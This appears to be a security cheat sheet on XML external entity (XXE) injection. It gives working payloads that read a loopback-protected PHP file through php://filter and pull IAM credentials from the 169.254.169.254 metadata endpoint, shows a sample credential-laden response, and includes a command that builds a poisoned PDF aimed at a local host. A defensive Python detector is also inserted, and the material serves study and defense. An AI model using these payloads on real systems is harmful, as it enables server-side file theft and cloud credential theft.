External Entity XML Injection

What Are XML External Entity (XXE) Attacks

Bypassing Access Controls with XXE

Default protections (the target script only allows loopback clients):

<?php
// Reject anything that arrived through a proxy header or from a non-loopback source address.
if (isset($_SERVER['HTTP_CLIENT_IP'])
    || isset($_SERVER['HTTP_X_FORWARDED_FOR'])
    || !in_array(@$_SERVER['REMOTE_ADDR'], array('127.0.0.1', '::1'))) {
    header('HTTP/1.0 403 Forbidden');
    exit('You are not allowed to access this file.');
}

PHP bypass (the XML parser on the server fetches the file itself, so REMOTE_ADDR is loopback and the check passes; php://filter base64-encodes the source so it survives as entity text):

<?xml version="1.0"?>
<!DOCTYPE results [
  <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">
]>
<results>
  <result>&harmless;</result>
</results>

External Error XXE

SSRF

Simple HTTP Connection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Response (the fetched metadata is reflected inside the error message):

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 546

"Invalid product ID: {
  "Code" : "Success",
  "LastUpdated" : "2019-12-12T18:17:44.456491Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "rNYgGiw5Wwv34YPVSzpN",
  "SecretAccessKey" : "m4RaetLQwyQwocJ60xjFJrwYnAJj03K8css1A9Fw",
  "Token" : "UCj4myxOKROLlb5wPp5Nahw2fHZsG5n1EkOGokbEtj7uCXa8bwoexc2wiX73Picn2AFwHa44f3Snpz02SuEmZtrTgma9Mr2J3Z48tXICOLyP3HgG5Sf7Q2ArYFZQNZoolTXwsX1jN2u2zTOtpoU0V34kcw0axRCXi9JusZ7z9QDrAWRroWeicvkRrKy7dkocW4MsQWxzINiiF39s4F5vRH7GQaKBahwprLJkd4NwH6PDY2IzlSLYpUxQzuJvS4tA",
  "Expiration" : "2025-12-10T18:17:44.456491Z"
}"
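Both the php://filter read above and the metadata fetch depend on the document declaring an external entity that the server-side parser then resolves. The following is an added example, not code from the original page: a pre-parse screening check in Python that records every external entity a document declares (without fetching anything) and classifies its target, so a gateway or input filter can reject such input before it reaches a parser that resolves entities. Names such as `assess` and `target_risk` are this example's own.

```python
import ipaddress
import xml.parsers.expat
from urllib.parse import urlsplit

# Schemes that read local files or wrap local streams (php://filter is the one used above).
LOCAL_SCHEMES = {"file", "php", "expect", "jar", "netdoc", "gopher", "ftp"}

def external_entities(xml_text):
    """Return (name, system_id, is_parameter) for every external entity declared in the DTD."""
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append((name, system_id, bool(is_param)))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # Refuse every resolution attempt: nothing is fetched, expat just aborts the parse
    # (declarations precede references, so they are already recorded by then).
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 0
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError:
        pass  # aborted or malformed input; keep what was declared before the error
    return found

def target_risk(system_id):
    """Classify where an external entity points: local resource, internal host, or remote."""
    parts = urlsplit(system_id or "")
    if not parts.scheme or parts.scheme.lower() in LOCAL_SCHEMES:
        return "local"
    try:
        addr = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return "remote"  # a DNS name; still external, still grounds for rejection
    if addr.is_loopback or addr.is_link_local or addr.is_private:
        return "internal"  # e.g. the 169.254.169.254 metadata endpoint
    return "remote"

def assess(xml_text):
    """Verdict for an inbound document: any external entity declaration is grounds to reject."""
    findings = [{"entity": n, "target": s, "parameter": p, "risk": target_risk(s)}
                for n, s, p in external_entities(xml_text)]
    return {"reject": bool(findings), "findings": findings}

if __name__ == "__main__":
    # Constructed sample, shortened from the metadata payload shown above.
    sample = ('<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
              '"http://169.254.169.254/latest/meta-data/">]><stockCheck><productId>&xxe;</productId></stockCheck>')
    print(assess(sample))
```

This is a screening layer, not the fix: the parser that actually handles the document must have external entity resolution disabled (in PHP, never pass LIBXML_NOENT to the DOM or SimpleXML loaders).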

Generate Payloads

oxml_xxe.rb generates DOCX/XLSX/PPTX, ODT, PDF and JPG test files:

SVG
PDF
Word Docs

Make a PDF

ruby oxml_xxe.rb --poc pdf -i 192.168.14.1:8000
|+| Inserting into ./samples/form.pdf. Currently this only tests for PUBLIC DTD
|+| Wrote to ./output/o_1636152138.pdf